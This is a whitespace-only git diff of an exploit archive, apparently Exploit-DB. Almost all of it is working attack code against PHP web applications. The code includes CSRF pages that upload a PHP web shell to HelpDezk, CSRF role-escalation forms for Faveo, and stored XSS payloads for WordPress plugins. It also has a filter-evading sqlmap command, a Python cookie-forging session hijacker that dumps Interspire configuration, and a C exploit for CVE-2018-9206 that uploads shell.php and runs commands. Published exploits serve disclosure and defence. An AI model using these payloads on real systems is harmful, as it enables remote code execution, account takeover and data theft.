+          "        system($cmd);\n" + 
+          "        echo \"\x3c/pre\x3e\";\n" + 
+          "        die;\n" + 
+          "}\n" + 
+          "\n" + 
+          "?\x3e\r\n" + 
+          "-----------------------------1883328331133778598415248998--\r\n";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i); 
+        xhr.send(new Blob([aBody]));
+      }
+    </script>
+    <form action="#">
+      <input type="button" value="Submit request" onclick="submitRequest();" />
+    </form>
+  </body>
 </html>
 
 ————
- <!-- CSRF PoC Page Header Logo -->
+ <!-- CSRF PoC Page Header Logo -->
 <html>
-  <body>
-    <script>
-      function submitRequest()
-      {
-        var xhr = new XMLHttpRequest();
-        xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload", true);
-        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
-        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
-        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------11525671838941487412014811928");
-        xhr.withCredentials = true;
-        var body = "-----------------------------11525671838941487412014811928\r\n" + 
-          "Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n" + 
-          "Content-Type: text/php\r\n" + 
-          "\r\n" + 
-          "\x3c?php\n" + 
-          "\n" + 
-          "if(isset($_REQUEST[\'cmd\'])){\n" + 
-          "        echo \"\x3cpre\x3e\";\n" + 
-          "        $cmd = ($_REQUEST[\'cmd\']);\n" + 
-          "        system($cmd);\n" + 
-          "        echo \"\x3c/pre\x3e\";\n" + 
-          "        die;\n" + 
-          "}\n" + 
-          "\n" + 
-          "?\x3e\r\n" + 
-          "-----------------------------11525671838941487412014811928--\r\n";
-        var aBody = new Uint8Array(body.length);
-        for (var i = 0; i < aBody.length; i++)
-          aBody[i] = body.charCodeAt(i); 
-        xhr.send(new Blob([aBody]));
-      }
-    </script>
-    <form action="#">
-      <input type="button" value="Submit request" onclick="submitRequest();" />
-    </form>
-  </body>
+  <body>
+    <script>
+      function submitRequest()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload", true);
+        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------11525671838941487412014811928");
+        xhr.withCredentials = true;
+        var body = "-----------------------------11525671838941487412014811928\r\n" + 
+          "Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n" + 
+          "Content-Type: text/php\r\n" + 
+          "\r\n" + 
+          "\x3c?php\n" + 
+          "\n" + 
+          "if(isset($_REQUEST[\'cmd\'])){\n" + 
+          "        echo \"\x3cpre\x3e\";\n" + 
+          "        $cmd = ($_REQUEST[\'cmd\']);\n" + 
+          "        system($cmd);\n" + 
+          "        echo \"\x3c/pre\x3e\";\n" + 
+          "        die;\n" + 
+          "}\n" + 
+          "\n" + 
+          "?\x3e\r\n" + 
+          "-----------------------------11525671838941487412014811928--\r\n";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i); 
+        xhr.send(new Blob([aBody]));
+      }
+    </script>
+    <form action="#">
+      <input type="button" value="Submit request" onclick="submitRequest();" />
+    </form>
+  </body>
 </html>
 
 ———————
-  <!-- CSRF PoC - Reports Logo -->
+  <!-- CSRF PoC - Reports Logo -->
 <html>
-  <body>
-    <script>
-      function submitRequest()
-      {
-        var xhr = new XMLHttpRequest();
-        xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload3", true);
-        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
-        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
-        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1789373681642463979344317937");
-        xhr.withCredentials = true;
-        var body = "-----------------------------1789373681642463979344317937\r\n" + 
-          "Content-Disposition: form-data; name=\"file\"; filename=\"index.php\"\r\n" + 
-          "Content-Type: text/php\r\n" + 
-          "\r\n" + 
-          "\x3c?php\n" + 
-          "\n" + 
-          "if(isset($_REQUEST[\'cmd\'])){\n" + 
-          "        echo \"\x3cpre\x3e\";\n" + 
-          "        $cmd = ($_REQUEST[\'cmd\']);\n" + 
-          "        system($cmd);\n" + 
-          "        echo \"\x3c/pre\x3e\";\n" + 
-          "        die;\n" + 
-          "}\n" + 
-          "\n" + 
-          "?\x3e\r\n" + 
-          "-----------------------------1789373681642463979344317937--\r\n";
-        var aBody = new Uint8Array(body.length);
-        for (var i = 0; i < aBody.length; i++)
-          aBody[i] = body.charCodeAt(i); 
-        xhr.send(new Blob([aBody]));
-      }
-    </script>
-    <form action="#">
-      <input type="button" value="Submit request" onclick="submitRequest();" />
-    </form>
-  </body>
+  <body>
+    <script>
+      function submitRequest()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload3", true);
+        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1789373681642463979344317937");
+        xhr.withCredentials = true;
+        var body = "-----------------------------1789373681642463979344317937\r\n" + 
+          "Content-Disposition: form-data; name=\"file\"; filename=\"index.php\"\r\n" + 
+          "Content-Type: text/php\r\n" + 
+          "\r\n" + 
+          "\x3c?php\n" + 
+          "\n" + 
+          "if(isset($_REQUEST[\'cmd\'])){\n" + 
+          "        echo \"\x3cpre\x3e\";\n" + 
+          "        $cmd = ($_REQUEST[\'cmd\']);\n" + 
+          "        system($cmd);\n" + 
+          "        echo \"\x3c/pre\x3e\";\n" + 
+          "        die;\n" + 
+          "}\n" + 
+          "\n" + 
+          "?\x3e\r\n" + 
+          "-----------------------------1789373681642463979344317937--\r\n";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i); 
+        xhr.send(new Blob([aBody]));
+      }
+    </script>
+    <form action="#">
+      <input type="button" value="Submit request" onclick="submitRequest();" />
+    </form>
+  </body>
 </html>
 
 ————
diff --git a/exploits/php/webapps/41830.txt b/exploits/php/webapps/41830.txt
index e36d7730c..67baa68e3 100644
--- a/exploits/php/webapps/41830.txt
+++ b/exploits/php/webapps/41830.txt
@@ -32,13 +32,13 @@ We have low privilege as “agent” to access application, and we want change t
 
 <!-- CSRF PoC -->
 <html>
-   <body>
-    <form action="http://example.com/faveo-helpdesk-1.9.3/public/rolechangeadmin/11" method="POST">
-      <input type="hidden" name="group" value="1" />
-      <input type="hidden" name="primary&#95;department" value="3" />
-      <input type="submit" value="Submit request" />
-    </form>
-  </body>
+   <body>
+    <form action="http://example.com/faveo-helpdesk-1.9.3/public/rolechangeadmin/11" method="POST">
+      <input type="hidden" name="group" value="1" />
+      <input type="hidden" name="primary&#95;department" value="3" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
 </html>
 
 - Before running “rolechange.html”, please login your account as agent and running your html script.
diff --git a/exploits/php/webapps/42193.txt b/exploits/php/webapps/42193.txt
index d62b9d915..1fea0419b 100644
--- a/exploits/php/webapps/42193.txt
+++ b/exploits/php/webapps/42193.txt
@@ -16,7 +16,7 @@ https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556[time based SQL INJ]
 
 https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556%20and%20sleep(10)--+
 
-sqlmap -u "http://vulnerable_site.com/inc/rdr.php?r=120c44c5" --dbms=mysql -p r --tamper=equaltolike,between  --hostname --technique=T -v 3 --random-agent --time-sec=4
+sqlmap -u "http://vulnerable_site.com/inc/rdr.php?r=120c44c5" --dbms=mysql -p r --tamper=equaltolike,between  --hostname --technique=T -v 3 --random-agent --time-sec=4
 
 NB: "equaltolike" and "between" arsenal to defeat filtering! Data retrieval process may take more than usual time.
 
diff --git a/exploits/php/webapps/43484.txt b/exploits/php/webapps/43484.txt
index 5764c034a..4745f21f1 100644
--- a/exploits/php/webapps/43484.txt
+++ b/exploits/php/webapps/43484.txt
@@ -29,19 +29,19 @@ Vulnerable code is located in file
 
 ```
 function acx_asmw_saveorder_callback() {
-    global $wpdb;
-    $social_widget_icon_array_order = $_POST['recordsArray'];
-    if ( current_user_can( 'manage_options' ) ) {
-        $social_widget_icon_array_order = serialize(
+    global $wpdb;
+    $social_widget_icon_array_order = $_POST['recordsArray'];
+    if ( current_user_can( 'manage_options' ) ) {
+        $social_widget_icon_array_order = serialize(
 $social_widget_icon_array_order );
-        update_option( 'social_widget_icon_array_order',
+        update_option( 'social_widget_icon_array_order',
 $social_widget_icon_array_order );
-        echo "<div id='acurax_notice' align='center' style='width:
+        echo "<div id='acurax_notice' align='center' style='width:
 420px; font-family: arial; font-weight: normal; font-size: 22px;'>";
-        echo "Social Media Icon's Order Saved";
-        echo "</div><br>";
-    }
-    die(); // this is required to return a proper result
+        echo "Social Media Icon's Order Saved";
+        echo "</div><br>";
+    }
+    die(); // this is required to return a proper result
 }
 
 add_action( 'wp_ajax_acx_asmw_saveorder', 'acx_asmw_saveorder_callback' );
@@ -56,9 +56,9 @@ XSS attack. The payload is available in plugin's settings.
 
 ```
 <pre class="lang:html decode:true "><form method="post" action="http://vuln.test/wp-admin/admin-ajax.php">
-    <input type="hidden" name="action" value="acx_asmw_saveorder">
-    <input type="text" name="recordsArray[]" value="1'><script>alert(1);</script>">
-    <button type="submit" value="Submit">Submit</button>
+    <input type="hidden" name="action" value="acx_asmw_saveorder">
+    <input type="text" name="recordsArray[]" value="1'><script>alert(1);</script>">
+    <button type="submit" value="Submit">Submit</button>
 </form>
 
 ```
diff --git a/exploits/php/webapps/43485.txt b/exploits/php/webapps/43485.txt
index 24997d419..efc64134e 100644
--- a/exploits/php/webapps/43485.txt
+++ b/exploits/php/webapps/43485.txt
@@ -35,12 +35,12 @@ Persistent XSS attack.
 
 ```
 <pre class="lang:html decode:true "><form method="post" action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php">
-    <input type="hidden" name="action" value="cms_tpv_add_page">
-    <input type="text" name="type" value="after">
-    <input type="text" name="pageID" value="1">
-    <input type="text" name="post_type" value="page">
-    <input type="text" name="page_title" value="<script>alert(2)</script>">
-    <button type="submit" value="Submit">Submit</button>
+    <input type="hidden" name="action" value="cms_tpv_add_page">
+    <input type="text" name="type" value="after">
+    <input type="text" name="pageID" value="1">
+    <input type="text" name="post_type" value="page">
+    <input type="text" name="page_title" value="<script>alert(2)</script>">
+    <button type="submit" value="Submit">Submit</button>
 </form>
 
 ```
@@ -55,13 +55,13 @@ create any post type.
 #!/usr/bin/env php
 <?php
 /*******************************************************************************
- * CMS Tree Page View [Privilege Escalation]
- *
- * To install deps run `composer require wordfence/exkit`.
- *
- * @author Panagiotis Vagenas <pan.vagenas@gmail.com>
- * @date 2017-08-09
- ******************************************************************************/
+ * CMS Tree Page View [Privilege Escalation]
+ *
+ * To install deps run `composer require wordfence/exkit`.
+ *
+ * @author Panagiotis Vagenas <pan.vagenas@gmail.com>
+ * @date 2017-08-09
+ ******************************************************************************/
 
 require_once __DIR__ . '/vendor/autoload.php';
 
@@ -84,17 +84,17 @@ WPAuthentication::USER_ROLE_SUBSCRIBER );
 Cli::writeInfo( 'Sending payload...' );
 
 $postData = [
-    'action'      => 'cms_tpv_add_page',
-    'type'        => 'after',
-    'pageID'      => '1',
-    'post_type'   => 'page',
-    'page_title' => date('Y-m-d H:i:s'),
+    'action'      => 'cms_tpv_add_page',
+    'type'        => 'after',
+    'pageID'      => '1',
+    'post_type'   => 'page',
+    'page_title' => date('Y-m-d H:i:s'),
 ];
 
 $r = $s->post( Endpoint::adminAjaxURL(), [], $postData);
 
 if(!$r->success || $r->body == '0'){
-    ExitCodes::exitWithFailed('Failed to retrieve a valid response');
+    ExitCodes::exitWithFailed('Failed to retrieve a valid response');
 }
 
 ExitCodes::exitWithSuccess('Exploitation successful');
diff --git a/exploits/php/webapps/43486.txt b/exploits/php/webapps/43486.txt
index 10db3a002..9417af6b7 100644
--- a/exploits/php/webapps/43486.txt
+++ b/exploits/php/webapps/43486.txt
@@ -35,13 +35,13 @@ Persistent XSS attack.
 
 ```
 <pre class="lang:html decode:true "><form method="post" action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php">
-    <input type="hidden" name="action" value="admin_menu_tree_page_view_add_page">
-    <input type="text" name="type" value="after">
-    <input type="text" name="pageID" value="1">
-    <input type="text" name="post_type" value="page">
-    <input type="text" name="page_titles[]" value="<script>alert(1)</script>">
-    <input type="text" name="post_status" value="publish">
-    <button type="submit" value="Submit">Submit</button>
+    <input type="hidden" name="action" value="admin_menu_tree_page_view_add_page">
+    <input type="text" name="type" value="after">
+    <input type="text" name="pageID" value="1">
+    <input type="text" name="post_type" value="page">
+    <input type="text" name="page_titles[]" value="<script>alert(1)</script>">
+    <input type="text" name="post_status" value="publish">
+    <button type="submit" value="Submit">Submit</button>
 </form>
 
 ```
@@ -56,13 +56,13 @@ create any post type.
 #!/usr/bin/env php
 <?php
 /*******************************************************************************
- * Admin Menu Tree Page View [Privilege Escalation]
- *
- * To install deps run `composer require wordfence/exkit`.
- *
- * @author Panagiotis Vagenas <pan.vagenas@gmail.com>
- * @date 2017-08-09
- ******************************************************************************/
+ * Admin Menu Tree Page View [Privilege Escalation]
+ *
+ * To install deps run `composer require wordfence/exkit`.
+ *
+ * @author Panagiotis Vagenas <pan.vagenas@gmail.com>
+ * @date 2017-08-09
+ ******************************************************************************/
 
 require_once __DIR__ . '/vendor/autoload.php';
 
@@ -86,18 +86,18 @@ WPAuthentication::USER_ROLE_SUBSCRIBER );
 Cli::writeInfo( 'Sending payload...' );
 
 $postData = [
-    'action'      => 'admin_menu_tree_page_view_add_page',
-    'type'        => 'after',
-    'pageID'      => '1',
-    'post_type'   => 'page',
-    'page_titles' => [ '<script>alert(1)</script>' ],
-    'post_status' => 'publish',
+    'action'      => 'admin_menu_tree_page_view_add_page',
+    'type'        => 'after',
+    'pageID'      => '1',
+    'post_type'   => 'page',
+    'page_titles' => [ '<script>alert(1)</script>' ],
+    'post_status' => 'publish',
 ];
 
 $r = $s->post( Endpoint::adminAjaxURL(), [], $postData);
 
 if(!$r->success || !$r->body == '0'){
-    ExitCodes::exitWithFailed('Failed to retrieve a valid response');
+    ExitCodes::exitWithFailed('Failed to retrieve a valid response');
 }
 
 ExitCodes::exitWithSuccess('Exploitation successful');
diff --git a/exploits/php/webapps/43909.html b/exploits/php/webapps/43909.html
index 9f3020554..868ea83d1 100644
--- a/exploits/php/webapps/43909.html
+++ b/exploits/php/webapps/43909.html
@@ -4,7 +4,7 @@
 # Vendor website : http://gnew.xyz/
 # Software download : http://www.gnew.xyz/pages/download.php
 # Version: 2018.1
-# Tested on: Windows 10 Home x64  / Kali Linux
+# Tested on: Windows 10 Home x64  / Kali Linux
 
 Product description :
 
@@ -24,23 +24,23 @@ POC :
 ------------------------------------ HTML--------------------------------------
 
 <form action="http://Target/gnew/admin/users.php " method="POST">
- <input type="hidden" name="_method" value="POST"/>
- <input type="hidden" name="user_name" value="test2"/>
- <input type="hidden" name="user_level" value="4"/>
- <input type="hidden" name="user_email" value="gnewtest@yopmail.com"/>
- <input type="hidden" name="user_show_email" value="0"/>
+ <input type="hidden" name="_method" value="POST"/>
+ <input type="hidden" name="user_name" value="test2"/>
+ <input type="hidden" name="user_level" value="4"/>
+ <input type="hidden" name="user_email" value="gnewtest@yopmail.com"/>
+ <input type="hidden" name="user_show_email" value="0"/>
 <input type="hidden" name="user_day" value="0"/>
 <input type="hidden" name="user_month" value="0"/>
 <input type="hidden" name="user_month" value="0"/>
- <input type="hidden" name="user_language" value="english"/>
- <input type="hidden" name="user_template" value="clean"/>
- <input type="hidden" name="user_date_format" value="D,+M+jS+Y,+g:i+a"/>
- <input type="hidden" name="user_date_offset" value="0"/>
+ <input type="hidden" name="user_language" value="english"/>
+ <input type="hidden" name="user_template" value="clean"/>
+ <input type="hidden" name="user_date_format" value="D,+M+jS+Y,+g:i+a"/>
+ <input type="hidden" name="user_date_offset" value="0"/>
 <input type="hidden" name="user_avatar" value=""/>
- <input type="hidden" name="user_date_offset" value="0"/>
- <input type="hidden" name="user_avatar"
+ <input type="hidden" name="user_date_offset" value="0"/>
+ <input type="hidden" name="user_avatar"
 value="./../images/avatars/empty.png"/>
- <input type="hidden" name="user_id" value="2"/>
+ <input type="hidden" name="user_id" value="2"/>
 <input type="hidden" name="user_level_old" value="1"/>
 <input type="hidden" name="user_name_old" value="test2"/>
 <input type="hidden" name="edit_user" value="Éditer"/>
diff --git a/exploits/php/webapps/44261.txt b/exploits/php/webapps/44261.txt
index 26052318a..944f9c064 100644
--- a/exploits/php/webapps/44261.txt
+++ b/exploits/php/webapps/44261.txt
@@ -11,7 +11,7 @@
 Vuln Code [+] redaxo/src/addons/myevents/pages/event_add.php
 ##############
 
-$myevents_id            =  strip_tags(rex_request('myevents_id', 'string'));
+$myevents_id            =  strip_tags(rex_request('myevents_id', 'string'));
 
 ###############
 POC
diff --git a/exploits/php/webapps/44513.py b/exploits/php/webapps/44513.py
index 1609d812d..7e17858f6 100755
--- a/exploits/php/webapps/44513.py
+++ b/exploits/php/webapps/44513.py
@@ -33,124 +33,124 @@ from pprint import pprint
 
 
 def cookie_cutter(url):
-    with requests.Session() as s:
-       s.get(url)
-       r = s.get(url)
-       response_regex = r.text
-       print("requesting initial Cookie\n")
-       print(str(r.headers)+"\n")
-       
-       for key,value in s.cookies.items():
-           if key and "IEMSESSIONID" in key:
-          
-              s.cookies.set('IEM_CookieLogin', "YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D")
-       print("Attempting To Posion 2nd request with Forged Cookie\n")
-       print("-" * 25)
-       r = s.get(url)
-       response_regex2 = r.text
-       print response_regex2
-       print(str(r.headers) + "\n")
-       if response_regex != response_regex2:
+    with requests.Session() as s:
+       s.get(url)
+       r = s.get(url)
+       response_regex = r.text
+       print("requesting initial Cookie\n")
+       print(str(r.headers)+"\n")
+       
+       for key,value in s.cookies.items():
+           if key and "IEMSESSIONID" in key:
+          
+              s.cookies.set('IEM_CookieLogin', "YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D")
+       print("Attempting To Posion 2nd request with Forged Cookie\n")
+       print("-" * 25)
+       r = s.get(url)
+       response_regex2 = r.text
+       print response_regex2
+       print(str(r.headers) + "\n")
+       if response_regex != response_regex2:
 
-          for key,value in s.cookies.items():
-              if "IEMSESSIONID" in key:
-                 try:
-                    #using session riding from previous cookie we grab the info we want :)
-                    bounce_info_grab(url,value)
-                    app_info_grab(url,value)
-                    privt_info_grab(url,value)
-                 except:
-                     pass
-                 return value,r.text
+          for key,value in s.cookies.items():
+              if "IEMSESSIONID" in key:
+                 try:
+                    #using session riding from previous cookie we grab the info we want :)
+                    bounce_info_grab(url,value)
+                    app_info_grab(url,value)
+                    privt_info_grab(url,value)
+                 except:
+                     pass
+                 return value,r.text
 
 
 def bounce_info_grab(url,session_to_ride):
-    url_grab = url+"?Page=Settings&Tab=2"
-    print(url_grab)
-    with requests.Session() as s:
-       s.get(url_grab)
-       s.cookies.set('IEMSESSIONID',session_to_ride)
-       r = s.get(url_grab)
-       response_regex = r.text
-       soup = BeautifulSoup(response_regex,'html5lib')
-       div = soup.find('div', id='div7')
-      
-        
-       outfile = open("bounce_report.txt",'w')
-       dataout = """<html><head>Report</head><title>Report</title>
-                    <body>""" + str(div) +"""</body></html>"""
-       outfile.write(dataout)
-       outfile.close()
-       for divy in div.contents:
-           print(divy)
-          
+    url_grab = url+"?Page=Settings&Tab=2"
+    print(url_grab)
+    with requests.Session() as s:
+       s.get(url_grab)
+       s.cookies.set('IEMSESSIONID',session_to_ride)
+       r = s.get(url_grab)
+       response_regex = r.text
+       soup = BeautifulSoup(response_regex,'html5lib')
+       div = soup.find('div', id='div7')
+      
+        
+       outfile = open("bounce_report.txt",'w')
+       dataout = """<html><head>Report</head><title>Report</title>
+                    <body>""" + str(div) +"""</body></html>"""
+       outfile.write(dataout)
+       outfile.close()
+       for divy in div.contents:
+           print(divy)
+          
 def app_info_grab(url,session_to_ride):
-    url_grab = url+"?Page=Settings&Tab=2"
-    print(url_grab)
-    with requests.Session() as s:
-       s.get(url_grab)
-       s.cookies.set('IEMSESSIONID',session_to_ride)
-       r = s.get(url_grab)
-       response_regex = r.text
-       soup = BeautifulSoup(response_regex,'html5lib')
-       div = soup.find('div', id='div1')
-    
-        
-       outfile = open("application_settings_report.txt",'w')
-       dataout = """<html><head>Report</head><title>Report</title>
-                    <body>""" + str(div) +"""</body></html>"""
-       outfile.write(dataout)
-       outfile.close()
-       for divy in div.contents:
-           print(divy)   
-    
+    url_grab = url+"?Page=Settings&Tab=2"
+    print(url_grab)
+    with requests.Session() as s:
+       s.get(url_grab)
+       s.cookies.set('IEMSESSIONID',session_to_ride)
+       r = s.get(url_grab)
+       response_regex = r.text
+       soup = BeautifulSoup(response_regex,'html5lib')
+       div = soup.find('div', id='div1')
+    
+        
+       outfile = open("application_settings_report.txt",'w')
+       dataout = """<html><head>Report</head><title>Report</title>
+                    <body>""" + str(div) +"""</body></html>"""
+       outfile.write(dataout)
+       outfile.close()
+       for divy in div.contents:
+           print(divy)   
+    
 def privt_info_grab(url,session_to_ride):
-    url_grab = url+"?Page=Settings&Tab=2"
-    print(url_grab)
-    with requests.Session() as s:
-       s.get(url_grab)
-       s.cookies.set('IEMSESSIONID',session_to_ride)
-       r = s.get(url_grab)
-       response_regex = r.text
-       soup = BeautifulSoup(response_regex,'html5lib')
-       div = soup.find('div', id='div8')
-     
-        
-       outfile = open("privtlbl_settings_report.txt",'w')
-       dataout = """<html><head>Report</head><title>Report</title>
-                    <body>""" + str(div) +"""</body></html>"""
-       outfile.write(dataout)
-       outfile.close()
-       for divy in div.contents:
-           print(divy)   
-    
+    url_grab = url+"?Page=Settings&Tab=2"
+    print(url_grab)
+    with requests.Session() as s:
+       s.get(url_grab)
+       s.cookies.set('IEMSESSIONID',session_to_ride)
+       r = s.get(url_grab)
+       response_regex = r.text
+       soup = BeautifulSoup(response_regex,'html5lib')
+       div = soup.find('div', id='div8')
+     
+        
+       outfile = open("privtlbl_settings_report.txt",'w')
+       dataout = """<html><head>Report</head><title>Report</title>
+                    <body>""" + str(div) +"""</body></html>"""
+       outfile.write(dataout)
+       outfile.close()
+       for divy in div.contents:
+           print(divy)   
+    
 def main():
-    url = sys.argv[1]
-    print  "Evaluating Target:" +url+ """ For CVE-2017-14322"""+"\n"
-    print "-" * 25
-    try:
-       session_rider_value,content = cookie_cutter(url)
-       print "Session Has Been Generated Entering Internal Data Dumping Routine"+"\n"
-       print "-" * 25
-       print "Magic Cookie Generated Modify Existing IEMSESSIONID Value In browser With Below Value "
-       print "-" * 25
-       print  session_rider_value+"\n"
-       print "-" * 25
-    except:
-       print "Target Is Not Vulnerable"
-       pass
-   
-    
+    url = sys.argv[1]
+    print  "Evaluating Target:" +url+ """ For CVE-2017-14322"""+"\n"
+    print "-" * 25
+    try:
+       session_rider_value,content = cookie_cutter(url)
+       print "Session Has Been Generated Entering Internal Data Dumping Routine"+"\n"
+       print "-" * 25
+       print "Magic Cookie Generated Modify Existing IEMSESSIONID Value In browser With Below Value "
+       print "-" * 25
+       print  session_rider_value+"\n"
+       print "-" * 25
+    except:
+       print "Target Is Not Vulnerable"
+       pass
+   
+    
 
 main()
 
 '''
 When Running this, if it is succesful check for 3 files in the directory of exploit to find crucial internal configs in Html format
 do not use this for bad just dont do it please.
- 
+ 
 
 3. Solution:
-   
+   
 Update to version 6.1.6 atleast
 http://www.interspire.com/emailmarketer 
 '''
\ No newline at end of file
diff --git a/exploits/php/webapps/46182.py b/exploits/php/webapps/46182.py
index 1883b416f..097b58bbd 100755
--- a/exploits/php/webapps/46182.py
+++ b/exploits/php/webapps/46182.py
@@ -31,73 +31,73 @@ void build_string (char *p, char *path, char *arg, char *ar1, int func);
 int
 main (int argc, char *argv[])
 {
-  int sock = 0, bytes_read = 0, total = 0, function = 0;
-  struct sockaddr_in serv_addr;
-  char buffer[BSIZE] = { 0 }, payload[BSIZE] = { 0};
+  int sock = 0, bytes_read = 0, total = 0, function = 0;
+  struct sockaddr_in serv_addr;
+  char buffer[BSIZE] = { 0 }, payload[BSIZE] = { 0};
 
-  if (argc <= 1)
-    {
-      printf
+  if (argc <= 1)
+    {
+      printf
 	("CVE-2018-9206 Exploit\n@_larry0\nUsage: %s hostname port path command\n",
 	argv[0]);
-      return (0);
-    }
-  if (argc == 5)
-    function = 1;
-  if ((sock = socket (AF_INET, SOCK_STREAM, 0)) < 0)
-    {
-      printf ("\nSocket creation error\n");
-      return (-1);
-    }
+      return (0);
+    }
+  if (argc == 5)
+    function = 1;
+  if ((sock = socket (AF_INET, SOCK_STREAM, 0)) < 0)
+    {
+      printf ("\nSocket creation error\n");
+      return (-1);
+    }
 
-  build_string (payload,argv[3] ,argv[1], argv[4], function);
+  build_string (payload,argv[3] ,argv[1], argv[4], function);
 
 if (!TESTONLY){
 
-  memset (&serv_addr, 0, sizeof (serv_addr));
+  memset (&serv_addr, 0, sizeof (serv_addr));
 
-  serv_addr.sin_family = AF_INET;
-  serv_addr.sin_port = htons (atoi (argv[2]));
+  serv_addr.sin_family = AF_INET;
+  serv_addr.sin_port = htons (atoi (argv[2]));
 
-  if (inet_pton (AF_INET, argv[1], &serv_addr.sin_addr) <= 0)
-    {
-      printf ("\nInvalid address.\n");
-      return (-1);
-    }
+  if (inet_pton (AF_INET, argv[1], &serv_addr.sin_addr) <= 0)
+    {
+      printf ("\nInvalid address.\n");
+      return (-1);
+    }
 
-  if (connect (sock, (struct sockaddr *) &serv_addr, sizeof (serv_addr)) < 0)
-    {
-      printf ("\nConnection Failed.\n");
-      return (-1);
-    }
-  send (sock, payload, strlen (payload), 0);
+  if (connect (sock, (struct sockaddr *) &serv_addr, sizeof (serv_addr)) < 0)
+    {
+      printf ("\nConnection Failed.\n");
+      return (-1);
+    }
+  send (sock, payload, strlen (payload), 0);
 }
-  if (DEBUG)
-    printf ("\nSending Payload:\n%s", payload);
+  if (DEBUG)
+    printf ("\nSending Payload:\n%s", payload);
 if (!TESTONLY) {
-  while (1)
-    {
-      bytes_read = recv (sock, buffer, BSIZE, 0);
-      total += bytes_read;
-      if (bytes_read <= 0)
+  while (1)
+    {
+      bytes_read = recv (sock, buffer, BSIZE, 0);
+      total += bytes_read;
+      if (bytes_read <= 0)
 	break;
-      printf ("%s", buffer);
-      bzero (buffer, BSIZE);
-    }
-  printf ("\n[+] Total bytes read: %d\n", total);
-  close (sock);
+      printf ("%s", buffer);
+      bzero (buffer, BSIZE);
+    }
+  printf ("\n[+] Total bytes read: %d\n", total);
+  close (sock);
 }
-  return (0);
+  return (0);
 }
 
 
 void
 build_string (char *p, char *path,char *arg, char *ar1, int func)
 {
-  if (func)
-      snprintf (p, BSIZE,
+  if (func)
+      snprintf (p, BSIZE,
 		"GET /%s/files/shell.php?cmd=%s HTTP/1.1\r\nHost: %s\r\nUser-Agent: blueimp jquery exploit/9.22.0\r\nAccept: */*\r\n\r\n", path,ar1, arg);
-  else
-    snprintf (p, BSIZE,
-	      "POST /%s/index.php HTTP/1.1\r\nHost: %s\r\nUser-Agent: blueimp jquery exploit/9.22.0\r\nAccept: */*\r\nContent-Length: 244\r\nContent-Type: multipart/form-data; boundary=------------------------c8e05c8871143853\r\n\r\n--------------------------c8e05c8871143853\r\nContent-Disposition: form-data; name=\"files\"; filename=\"shell.php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php $cmd=$_GET['cmd']; system($cmd);?>\r\n\r\n--------------------------c8e05c8871143853--\r\n\r\n",path, arg);
+  else
+    snprintf (p, BSIZE,
+	      "POST /%s/index.php HTTP/1.1\r\nHost: %s\r\nUser-Agent: blueimp jquery exploit/9.22.0\r\nAccept: */*\r\nContent-Length: 244\r\nContent-Type: multipart/form-data; boundary=------------------------c8e05c8871143853\r\n\r\n--------------------------c8e05c8871143853\r\nContent-Disposition: form-data; name=\"files\"; filename=\"shell.php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php $cmd=$_GET['cmd']; system($cmd);?>\r\n\r\n--------------------------c8e05c8871143853--\r\n\r\n",path, arg);
 }
\ No newline at end of file
diff --git a/exploits/php/webapps/46734.txt b/exploits/php/webapps/46734.txt
index 98e9740d7..a99b8f639 100644
--- a/exploits/php/webapps/46734.txt
+++ b/exploits/php/webapps/46734.txt
@@ -32,17 +32,17 @@ PoC
 ```html
 <form method="post"
 action="http://wp-csrf-new.test/wp-admin/admin-ajax.php?action=/../../../../../../index">
-    <label>AJAX action:
-        <select name="action">
-                <option
+    <label>AJAX action:
+        <select name="action">
+                <option
 value="ContactFormMakerPreview">ContactFormMakerPreview</option>
-                <option
+                <option
 value="ContactFormmakerwdcaptcha">ContactFormmakerwdcaptcha</option>
-                <option
+                <option
 value="nopriv_ContactFormmakerwdcaptcha">nopriv_ContactFormmakerwdcaptcha</option>
